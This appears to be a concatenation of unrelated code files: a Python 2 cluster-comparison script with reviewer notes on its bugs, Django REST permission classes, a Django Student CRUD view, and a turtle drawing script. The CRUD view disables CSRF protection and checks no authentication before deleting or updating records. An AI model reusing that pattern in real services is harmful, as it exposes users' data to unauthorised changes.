# directory = "C:\Users\Al\Videos\LinkMetric\TRIAL-2"
track(directory, "Vilentum Hogeschool", activated=False)
# NOTE(review): range(3, 0) is empty -- neither loop below ever runs;
# range(3, 0, -1) was probably intended.
for i in range(3, 0):
    print "\nITERATION {}".format(i)
    Plt.cluster_d_test(union_031, network_size=i, targets=targets,
                       directory=directory, greater_equal=greater_equal, limit=None, activated=True)
for i in range(3, 0):
    print "\nITERATION {}".format(i)
    Plt.cluster_d_test(union_032, network_size=i, targets=targets,
                       directory=directory, greater_equal=greater_equal, limit=None, activated=True)
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
INVESTIGATION 01 : COMPARE CLUSTERS FORM 50 METERS TO THOSE OF 100 METERS AND 1 KILOMETER
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
# Root folder that holds the cluster-analysis dumps compared below.
ANALYSIS_01 = "C:\Users\Al\Videos\LinkMetric\LinkAnalysis_01"
# CLUSTER USING NEARBY 50 METERS
# NOTE(review): unlike set_02/set_03 below there is no separator between
# "3_Analysis_20180109" and "union_..." -- missing backslash? Confirm the folder name.
set_01 = join(ANALYSIS_01, "3_Analysis_20180109union_Grid_20170712_Eter_2014_Orgreg_20170718_P1310881121")
# CLUSTER USING NEARBY 100 METERS
set_02 = join(ANALYSIS_01, "3_Analysis_20180109\union_Grid_20170712_Eter_2014_Orgreg_20170718_N758253463")
# CLUSTER USING NEARBY 1000 METERS
set_03 = join(ANALYSIS_01, "3_Analysis_20180109\union_Grid_20170712_Eter_2014_Orgreg_20170718_N162258616")
# COMPARE CLUSTERS STEMMED FROM NEARBY 50 TO THOSE STEMMED FROM NEARBY 100
# (both comparisons are disabled via activated=False)
folder_check(set_01, set_02, diff_2=True, intersection=True, tracking=True, track_dir=ANALYSIS_01, activated=False)
# COMPARE CLUSTERS STEMMED FROM NEARBY 50 TO THOSE STEMMED FROM NEARBY 1000
folder_check(set_01, set_03, diff_1=True, tracking=True, track_dir=ANALYSIS_01, activated=False)
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
ANALYSING THE LINKED NETWORK FILES TEST-1
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
# Cluster-folder naming convention: "<SIZE>_Analysis_<date>\<lens-name>".
SIZE = 5
TEST_1 = "C:\Users\Al\Videos\LinkMetric\TRIAL-5\\"
# CLUSTER USING NEARBY 50 METERS BEFORE
set_0 = join(TEST_1, "{}_Analysis_20180120\union_Grid_20170712_Eter_2014_Orgreg_20170718_P451472011".format(SIZE))
# CLUSTER USING NEARBY 50 METERS AFTER
set_1 = join(TEST_1, "{}_Analysis_20180120\union_Grid_20170712_Eter_2014_Orgreg_20170718_P1310881121".format(SIZE))
# CLUSTER USING NEARBY 500 METERS BEFORE
set_2 = join(TEST_1, "{}_Analysis_20180120\union_Grid_20170712_Eter_2014_Orgreg_20170718_N747654693".format(SIZE))
# CLUSTER USING NEARBY 500 METERS AFTER
set_3 = join(TEST_1, "{}_Analysis_20180120\union_Grid_20170712_Eter_2014_Orgreg_20170718_N758253463".format(SIZE))
# CLUSTER USING NEARBY 1000 METERS and EXACT
set_4 = join(TEST_1, "{}_Analysis_20180120\union_Grid_20170712_Eter_2014_Orgreg_20170718_N1996365419".format(SIZE))
set_5 = join(TEST_1, "{}_Analysis_20180120\union_Grid_20170712_Eter_2014_Orgreg_20170718_N162258616".format(SIZE))
# LOOKING AT CLUSTERS THAT EVOLVED AS THE MATCHING METHOD LOOSENS UP
# THE SET DIFFERENCE REVEALS THAT 26 CLUSTERS OF SIZE 3 EVOLVED
# NOTE(review): `directory` still holds whatever an earlier section assigned -- confirm.
folder_check(set_0, set_1, diff_1=True, intersection=True, tracking=False, track_dir=directory, activated=True)
print "\n**************************************************************\n"
folder_check(set_2, set_3, diff_1=True, intersection=True, tracking=False, track_dir=directory, activated=True)
print "\n**************************************************************\n"
folder_check(set_4, set_5, diff_1=True, intersection=True, tracking=False, track_dir=directory, activated=True)
# TRACKING THE CLUSTERS THAT EVOLVED
# track(directory, track_3)
folder_check(set_4, set_1, diff_2=True, tracking=True, track_dir=TEST_1, activated=False)
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
ANALYSING THE LINKED NETWORK FILES TEST-2
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
# Older (commented) input paths kept for reference:
# t50 = "C:\Users\Al\Videos\LinkMetric\7_Analysis_20171215\union_Eter_2014_Orgreg_20170718_Grid_20170712_N2030153069"
# t100 = "C:\Users\Al\Videos\LinkMetric\7_Analysis_20171215\union_Grid_20170712_Eter_2014_Orgreg_20170718_N1655042445"
# t1000 = "C:\Users\Al\Videos\LinkMetric\7_Analysis_20171215\union_Eter_2014_Orgreg_20170718_Grid_20170712_P1640316176"
t50 = "C:\Users\Al\Videos\LinkMetric\Test-2\\3_Analysis_20171229\union_Eter_2014_Orgreg_20170718_Grid_20170712_N2030153069"
t100 = "C:\Users\Al\Videos\LinkMetric\Test-2\\3_Analysis_20171229\union_Grid_20170712_Eter_2014_Orgreg_20170718_N1655042445"
t1000 = "C:\Users\Al\Videos\LinkMetric\Test-2\\3_Analysis_20171229\union_Eter_2014_Orgreg_20170718_Grid_20170712_P1640316176"
app = "C:\Users\Al\Videos\LinkMetric\Test-2\\3_Analysis_20171229\union_Eter_2014_Orgreg_20170718_Grid_20170712_N1942436340"
# NOTE(review): unlike the lines above, this one lacks the doubled backslash
# before "3_Analysis" -- confirm the path is still valid.
U_ap_50 = "C:\Users\Al\Videos\LinkMetric\Test-2\3_Analysis_20171229\union_Grid_20170712_Eter_2014_Orgreg_20170718_P571882700"
# wr = codecs.open("C:\Users\Al\Videos\LinkMetric\\"
# "7_Analysis_20171220\union_Eter_2014_Orgreg_20170718_Grid_20170712_N2030153069\\"
# "7_N2141339763\cluster_N2141339763_20171220.txt", "rb")
# text = wr.read()
# print text.__contains__("<http://www.grid.ac/institutes/grid.457417.4>")
# wr.close()
# print "DOE!"
# main folder
# Sub-Folders
# target folders
# Target file
# Comparison
track_3 = "<http://risis.eu/eter_2014/resource/HU0023>"
track_5 = "<http://www.grid.ac/institutes/grid.469502.c>"  # NOTE(review): unused in this chunk.
# track(directory, "<http://risis.eu/eter_2014/resource/FR0088>")
# track(directory, "<http://www.grid.ac/institutes/grid.452199.2>")
folder_check(t50, t100)
folder_check(t50, t1000)
directory = "C:\Users\Al\Videos\LinkMetric\Test-1"
# folder_check(t50, app, True)
folder_check(app, t50)
folder_check(U_ap_50, t50)
track(directory, track_3)
print "DONE!!!" |
from rest_framework import permissions
class IsCreatorOrReadOnly(permissions.BasePermission):
    """Object-level permission: anyone may read, only the creator may write."""

    def has_object_permission(self, request, view, obj):
        # Safe verbs (GET/HEAD/OPTIONS) always pass; mutating verbs are
        # restricted to the object's creator.
        is_read_only = request.method in permissions.SAFE_METHODS
        return is_read_only or obj.creator == request.user
# class CanUpdateOrDeleteCommit(permissions.BasePermission):
# def has_object_permission(self, request, view, obj):
# if request.method in permissions.SAFE_METHODS or request.method == 'POST':
# return True
# return obj.creator == request.user
class CanSeePost(permissions.BasePermission):
    """Permit viewing a post when its author is public or followed by the requester."""

    def has_object_permission(self, request, view, obj):
        # IDs of users the requester follows with an accepted (is_agree=True)
        # request, plus the requester's own id so users always see their own posts.
        allowed_ids = list(
            request.user.following.filter(is_agree=True).values_list('to_user', flat=True)
        )
        allowed_ids.append(request.user.id)
        return obj.creator.is_public or obj.creator_id in allowed_ids
|
from django.shortcuts import render
from django.views.generic import View
from testapp.models import Student
from testapp.utils import is_json
from testapp.mixin import HttpResponseMixin, SerializeMixin
import json
from testapp.forms import StudentForm
from django.views.decorators.csrf import csrf_exempt
from django.utils.decorators import method_decorator
# Create your views here.
@method_decorator(csrf_exempt, name='dispatch')
class StudentCRUDView(HttpResponseMixin, SerializeMixin, View):
    """JSON-over-HTTP CRUD endpoint for :class:`Student`.

    Every verb reads a JSON payload from the request body; responses are
    produced via ``render_to_http_response`` and ``serialize`` supplied by
    the mixins. CSRF is disabled because clients post raw JSON.
    """

    def get_object_by_id(self, id):
        """Return the Student with primary key ``id``, or None if absent."""
        try:
            stu = Student.objects.get(id=id)
        except Student.DoesNotExist:
            stu = None
        return stu

    def _parse_body(self, request):
        """Validate and parse the request body as JSON.

        Returns ``(payload, None)`` on success or ``(None, error_response)``
        on failure. Extracted because every HTTP verb repeated the same
        validation boilerplate.
        """
        data = request.body
        if not is_json(data):
            json_data = json.dumps({'msg': 'Provide some valid json data'})
            return None, self.render_to_http_response(json_data)
        return json.loads(data), None

    def _missing_record_response(self):
        """Shared 'unknown id' response used by GET/PUT/DELETE."""
        json_data = json.dumps(
            {'msg': 'Given ID is Not Matched With exsiting record, Please Give some valid ID'})
        return self.render_to_http_response(json_data)

    # Get Operations
    def get(self, request, *args, **kwargs):
        """Return one student (when an 'id' is supplied) or the full list."""
        pdata, error = self._parse_body(request)
        if error is not None:
            return error
        id = pdata.get('id', None)
        if id is not None:
            stu = self.get_object_by_id(id)
            if stu is None:
                return self._missing_record_response()
            return self.render_to_http_response(self.serialize([stu, ]))
        qs = Student.objects.all()
        return self.render_to_http_response(self.serialize(qs))

    # Post Operations
    def post(self, request, *args, **kwargs):
        """Create a new student from the JSON payload."""
        stu_data, error = self._parse_body(request)
        if error is not None:
            return error
        form = StudentForm(stu_data)
        if form.is_valid():
            form.save(commit=True)
            json_data = json.dumps({'msg': 'Record created successfully'})
        else:
            # BUG FIX: previously an invalid form with empty ``errors`` fell
            # off the end of the method, returning None; a response is now
            # always produced.
            json_data = json.dumps(form.errors)
        return self.render_to_http_response(json_data)

    # Update Operations
    def put(self, request, *args, **kwargs):
        """Partially update a student: merge the payload over stored values."""
        provided_data, error = self._parse_body(request)
        if error is not None:
            return error
        id = provided_data.get('id', None)
        if id is None:
            json_data = json.dumps({'msg': 'ID is mandatory for Update Operation, please provide ID'})
            return self.render_to_http_response(json_data)
        stu = self.get_object_by_id(id)
        if stu is None:
            return self._missing_record_response()
        # Seed the form with the current values so a partial payload acts as
        # a PATCH-style update rather than wiping the omitted fields.
        original_data = {
            'name': stu.name,
            'rollno': stu.rollno,
            'mark': stu.mark,
            'division': stu.division,
            'addrs': stu.addrs,
        }
        original_data.update(provided_data)
        form = StudentForm(original_data, instance=stu)
        if form.is_valid():
            form.save(commit=True)
            json_data = json.dumps({'msg': 'Record Updated successfully'})
        else:
            json_data = json.dumps(form.errors)
        return self.render_to_http_response(json_data)

    # Delete Operations
    def delete(self, request, *args, **kwargs):
        """Delete the student whose 'id' is given in the payload."""
        stu_data, error = self._parse_body(request)
        if error is not None:
            return error
        id = stu_data.get('id', None)
        if id is None:
            json_data = json.dumps({'msg': 'ID is mandatory for Deletion Operation, please provide ID'})
            return self.render_to_http_response(json_data)
        stu = self.get_object_by_id(id)
        if stu is None:
            return self._missing_record_response()
        # Model.delete() returns (total_deleted, per-type dict); one row
        # deleted means success.
        status, delete_items = stu.delete()
        if status == 1:
            json_data = json.dumps({'msg': 'Record Deleted successfully'})
            return self.render_to_http_response(json_data)
        json_data = json.dumps({'msg': 'Unable to delete record.....please try again'})
        return self.render_to_http_response(json_data)
|
import turtle
# Shared turtle pen used by every drawing helper in this script.
garis = turtle.Turtle()
def kotak(sudut, maju):
    """Draw one square with side length ``maju``, then rotate by ``sudut`` degrees.

    The trailing rotation is what fans repeated squares out into a circular
    pattern (see ``lingkaran``).
    """
    for i in range(4):
        garis.forward(maju)
        garis.right(90)
    # BUG FIX: ``sudut`` was accepted but never used, so every square was
    # drawn on top of the previous one; rotate so the next square is tilted.
    garis.right(sudut)
def lingkaran():
    """Draw 360 squares (side 100, angle argument 11) to build a circular pattern."""
    putaran = 360  # one square per degree of a full turn
    for _ in range(putaran):
        kotak(11, 100)
# Script entry point: draw the full pattern.
lingkaran()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.